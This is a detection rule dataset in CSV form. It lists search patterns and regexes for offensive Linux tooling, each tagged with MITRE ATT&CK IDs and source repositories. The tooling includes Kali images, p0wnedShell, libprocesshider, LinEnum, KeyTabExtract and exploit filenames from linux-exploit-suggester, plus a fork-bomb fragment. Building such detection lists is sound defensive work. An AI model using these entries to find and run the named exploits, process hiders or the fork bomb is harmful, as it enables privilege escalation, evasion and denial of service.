"*kali-linux-*.vmwarevm*",".{0,1000}kali\-linux\-.{0,1000}\.vmwarevm.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux-*.vmx*",".{0,1000}kali\-linux\-.{0,1000}\.vmx.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*Get-Content ./EncodedPayload.bat*",".{0,1000}Get\-Content\s\.\/EncodedPayload\.bat.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#linux","N/A","N/A","10","1527","336","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z"
"*Get-Content ./Roast.hash*",".{0,1000}Get\-Content\s\.\/Roast\.hash.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#linux","N/A","N/A","10","1527","336","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z"
"*kali-linux-*-installer-amd64.iso*",".{0,1000}kali\-linux\-.{0,1000}\-installer\-amd64\.iso.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux-*-installer-everything-amd64.iso.torrent*",".{0,1000}kali\-linux\-.{0,1000}\-installer\-everything\-amd64\.iso\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux-*-live-everything-amd64.iso.torrent*",".{0,1000}kali\-linux\-.{0,1000}\-live\-everything\-amd64\.iso\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux-*-raspberry-pi-armhf.img.xz*",".{0,1000}kali\-linux\-.{0,1000}\-raspberry\-pi\-armhf\.img\.xz.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux-*-virtualbox-amd64.ova*",".{0,1000}kali\-linux\-.{0,1000}\-virtualbox\-amd64\.ova.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux-*-vmware-amd64.7z*",".{0,1000}kali\-linux\-.{0,1000}\-vmware\-amd64\.7z.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kalilinux/kali-rolling*",".{0,1000}kalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*nethunter-*.torrent*",".{0,1000}nethunter\-.{0,1000}\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*nethunter-*.zip*",".{0,1000}nethunter\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*nethunter-*-oos-ten-kalifs-full.zip*",".{0,1000}nethunter\-.{0,1000}\-oos\-ten\-kalifs\-full\.zip.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*wsl kali-linux*",".{0,1000}wsl\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*www.kali.org/get-kali/*",".{0,1000}www\.kali\.org\/get\-kali\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kalitorify*",".{0,1000}kalitorify.{0,1000}","offensive_tool_keyword","kalitorify","kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). or if Tor has been configured correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","#linux","N/A","N/A","10","1055","228","2024-04-18T07:11:44Z","2016-02-03T20:42:46Z"
"*/katoolin3*",".{0,1000}\/katoolin3.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","353","115","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z"
"*/s-h-3-l-l/*",".{0,1000}\/s\-h\-3\-l\-l\/.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","353","115","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z"
"*cd katoolin3*",".{0,1000}cd\skatoolin3.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","0","#linux","N/A","N/A","4","353","115","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z"
"*katoolin*toollist.py*",".{0,1000}katoolin.{0,1000}toollist\.py.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","353","115","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z"
"*katoolin3.py*",".{0,1000}katoolin3\.py.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","353","115","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z"
"*KeyTabExtract*",".{0,1000}KeyTabExtract.{0,1000}","offensive_tool_keyword","KeyTabExtract","KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. Encryption Type and NTLM Hash","T1003 - T1552.004 - T1110 - T1210","TA0006 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/sosdave/KeyTabExtract","1","0","#linux","N/A","N/A","3","221","44","2020-08-26T01:03:37Z","2019-03-18T15:00:14Z"
"* evil_script.py*",".{0,1000}\sevil_script\.py.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"* libprocesshider.so *",".{0,1000}\slibprocesshider\.so\s.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*/evil_script.py*",".{0,1000}\/evil_script\.py.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*/libprocesshider.git*",".{0,1000}\/libprocesshider\.git.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","1","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*/libprocesshider.so*",".{0,1000}\/libprocesshider\.so.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*/processhider.c*",".{0,1000}\/processhider\.c.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*\evil_script.py*",".{0,1000}\\evil_script\.py.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*16d765e024adacabe84e9fd889030f5481546ef711bba0043e7e84eadd257d1a*",".{0,1000}16d765e024adacabe84e9fd889030f5481546ef711bba0043e7e84eadd257d1a.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#filehash #linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*eb5fee1e402f321c8e705776faf2be7bbede5d2a24fe3ac40be082a75429f927*",".{0,1000}eb5fee1e402f321c8e705776faf2be7bbede5d2a24fe3ac40be082a75429f927.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#filehash #linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*gianlucaborello/libprocesshider*",".{0,1000}gianlucaborello\/libprocesshider.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","1","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/*",".{0,1000}https\:\/\/sysdig\.com\/blog\/hiding\-linux\-processes\-for\-fun\-and\-profit\/.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","1","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*sock.send(""""I AM A BAD BOY"""")*",".{0,1000}sock\.send\(\""I\sAM\sA\sBAD\sBOY\""\).{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1028","321","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z"
"*/LinEnum.git*",".{0,1000}\/LinEnum\.git.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7078","1996","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z"
"*/LinEnum/*",".{0,1000}\/LinEnum\/.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7078","1996","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z"
"*LinEnum.sh*",".{0,1000}LinEnum\.sh.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7078","1996","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z"
"*LinEnum-master.ip*",".{0,1000}LinEnum\-master\.ip.{0,1000}","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","#linux","N/A","10","10","7078","1996","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z"
"*:(){:I: &I*",".{0,1000}\:\(\)\{\:I\:\s\&I.{0,1000}","greyware_tool_keyword","linux","fork bomb linux - denial-of-service attack wherein a process continually replicates itself to deplete available system resources slowing down or crashing the system due to resource starvation","T1499","TA0040","N/A","N/A","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","#linux","N/A","10","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*/bin-sploits/*.zip*",".{0,1000}\/bin\-sploits\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/clown-newuser.c*",".{0,1000}\/clown\-newuser\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/CVE*/chocobo_root*",".{0,1000}\/CVE.{0,1000}\/chocobo_root.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/CVE-2009-2698/katon.c*",".{0,1000}\/CVE\-2009\-2698\/katon\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/exploit.cron.sh*",".{0,1000}\/exploit\.cron\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/exploit.ldpreload.sh*",".{0,1000}\/exploit\.ldpreload\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/full-nelson.c*",".{0,1000}\/full\-nelson\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/full-nelson64*",".{0,1000}\/full\-nelson64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/linux_ldso_dynamic.c*",".{0,1000}\/linux_ldso_dynamic\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/linux_ldso_hwcap.c*",".{0,1000}\/linux_ldso_hwcap\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/linux_ldso_hwcap_64.c*",".{0,1000}\/linux_ldso_hwcap_64\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/linux_offset2lib.c*",".{0,1000}\/linux_offset2lib\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/local-exploits/master/CVE*",".{0,1000}\/local\-exploits\/master\/CVE.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/localroot/2.6.x/elflbl*",".{0,1000}\/localroot\/2\.6\.x\/elflbl.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/localroot/2.6.x/h00lyshit*",".{0,1000}\/localroot\/2\.6\.x\/h00lyshit.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/memodipper64*",".{0,1000}\/memodipper64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/mempodipper.c*",".{0,1000}\/mempodipper\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/mzet-/les-res*",".{0,1000}\/mzet\-\/les\-res.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/nginxed-root.sh*",".{0,1000}\/nginxed\-root\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/NotQuite0DayFriday/zip/trunk*",".{0,1000}\/NotQuite0DayFriday\/zip\/trunk.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/p_cve-2014-9322.tar.gz*",".{0,1000}\/p_cve\-2014\-9322\.tar\.gz.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/perf_swevent64*",".{0,1000}\/perf_swevent64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/raceabrt.c*",".{0,1000}\/raceabrt\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/timeoutpwn64*",".{0,1000}\/timeoutpwn64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/tomcat-RH-root.sh*",".{0,1000}\/tomcat\-RH\-root\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/UserNamespaceOverlayfsSetuidWriteExec/*",".{0,1000}\/UserNamespaceOverlayfsSetuidWriteExec\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*/vnik_v1.c*",".{0,1000}\/vnik_v1\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*baron-samedit-heap-based-overflow-sudo.txt*",".{0,1000}baron\-samedit\-heap\-based\-overflow\-sudo\.txt.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
"*CVE*/exploit.sh*",".{0,1000}CVE.{0,1000}\/exploit\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5692","1110","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z"
